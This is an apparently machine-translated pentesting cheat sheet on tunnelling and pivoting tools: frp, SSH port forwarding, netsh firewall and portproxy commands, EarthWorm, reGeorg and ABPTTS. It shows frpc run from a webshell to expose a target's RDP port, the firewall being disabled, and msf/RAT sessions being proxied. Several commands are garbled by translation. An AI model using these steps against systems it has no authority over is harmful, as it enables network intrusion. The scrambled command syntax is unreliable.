frp
project address
https://github.com/fatedier/frp/
Brief introduction
- frp a reverse proxy can be used for high-performance applications in the network penetration, support tcp, udp protocol, it provides additional capabilities for http and https application protocol, and try to support the penetration point
- Cross-platform support linux, win, mac
- Similar ngrok, operation and maintenance, developers often use the machines within its network management and debug programs, such as forwards 22,3389 internal network to the public network, local developers will be forwarded to the public network debugging web services, msf / rat Remote Control in the online line, you can replace a few years ago the popular "Netcom" service
- Pros: do not need to avoid killing, support for encrypted transmission
Basic Usage
-
Vps deployed on a public network ip of the server, and then run on the client machine within the network can target even the anti-public machine, that machine forwarded to the public network to network depending on the configuration of the destination port. There are also some online free and fee-frp services, without having to deploy their own server.
-
A simple example:
service and client support configuration ini file and run the command line to run, following the example for the command line.1
2Server: ./ frps -p <service listening port> -t <token>
Client: ./ frpc tcp -s <server ip>: <server port> -r <corresponding port on the server is listening> - i <network address> -l <network port> -t <token> --ue --uc-ue -uc encryption and compression, respectively (use_encryption && use_compression)
For example, the transfer port 3389 issued by the machine webshell
1
2Your machine: ./ FRPs -p 7890 -t woshitoken
Webshell: frpc.exe 1.1.1.1:7890 -r -s 9999 -i tcp 127.0.0.1 3389 the -l -t woshitoken - UE - UCAt this time you access the machine's 9999 port, you can visit the 3389 port of the target machine.
-
View more usage parameters github project.
SSH
Brief introduction
-
SSH automatically encrypts and decrypts the data network between all SSH client and server. However, SSH is also at the same time provides a very useful feature, this is the port forwarding
-
Advantages: linux comes, transmission encryption, support socks proxy
Usage Example
Related parameters:
1 |
-C: the compressed data transmission. |
Local Forwarding (established local monitor)
1 |
ssh -C -f -N -g -L <local monitor ip>: <local port>: <remote ip>: <remote port> username @ target IP -p <ssh port> |
Remote forward (establish a remote monitor)
1 |
ssh -C -f -N -g -R <Remote IP>: <Remote Port>: <Local IP>: <local port> username @ target IP -p <ssh port> |
Note: If the remote does not monitor 0.0.0.0, the following two methods:
1 |
1. The need to modify the configuration ssh / etc / ssh / sshd_config |
Dynamic Forwarding (socks)
1 |
ssh -C -f -N -g -D <Local ip>: <local port> username @ target IP -p <ssh port> |
Socks proxy on local port 1080, 192.168.2.101 to access intranet environment
netsh
Brief introduction
- netsh is an acronym for Network Shell is a powerful windows provide us with the function of the network configuration command-line tool.
- Support tcp, udp port forwarding and forward modify firewall rules, there is no reverse forwarding function does not support socks.
- Advantages: win comes, support ipv4 and v6.
usage
-
In xp / 2003 under use, first install ipv6, Bahrain need to restart the machine to take effect
1netsh interface ipv6 install
Firewall Management
-
For operation command xp / 2003 and different systems after, and xp / 2003 firewall Outbound Inbound not distinguished
1
2
3
4
5
6netsh firewall show state Firewall to view the status, the results can be seen from the display of the functional modules to disable the firewall and enable the situation.
netsh firewall set opmode disable to disable system firewall
netsh firewall set opmode enable to enable the firewall.
netsh firewall add portopening TCP <port number> "Rule name" xx port allows inbound and outbound
netsh firewall delete portopening TCP <port number> Remove The rule -
For the system after 2003, the following command
1
2
3
4
5
6netsh advfirewall show allprofiles view the status of the firewall
netsh advfirewall set allprofiles state on open firewall
netsh advfirewall set allprofiles state off turn off the firewall
netsh advfirewall firewall add rule name = "Rule name" dir = in (in inbound, out for outbound) action = allow (allow for the release, block to block) protocol = TCP localport = <port number> Add rules
netsh advfirewall firewall delete rule name = "rule name" dir = in protocol = TCP localport = < port number> delete rules
Port Forwarding
1 |
netsh interface portproxy show all to see all forwarding rules that have been set |
(earthworm)
project address
https://github.com/rootkiter/EarthWorm
https://github.com/rootkiter/EarthWorm/blob/master/server/download/ew.zip
Brief introduction
- Tcp port forwarding to support positive and negative, similar lcx (htran)
- Reverse socks proxy support
- Disadvantages: traffic is not encrypted, it is necessary to avoid killing
Usage brief description
1 |
-l local port to listen |
reGeorg&ABPTTS
project address
https://github.com/sensepost/reGeorg
https://github.com/nccgroup/ABPTTS
Brief introduction
Both HTTP tunneling for Web applications, simple to use, see the github project details
reGeorg have not been tested successfully
SSH with his very convenient, generally in the open proxy mapping msf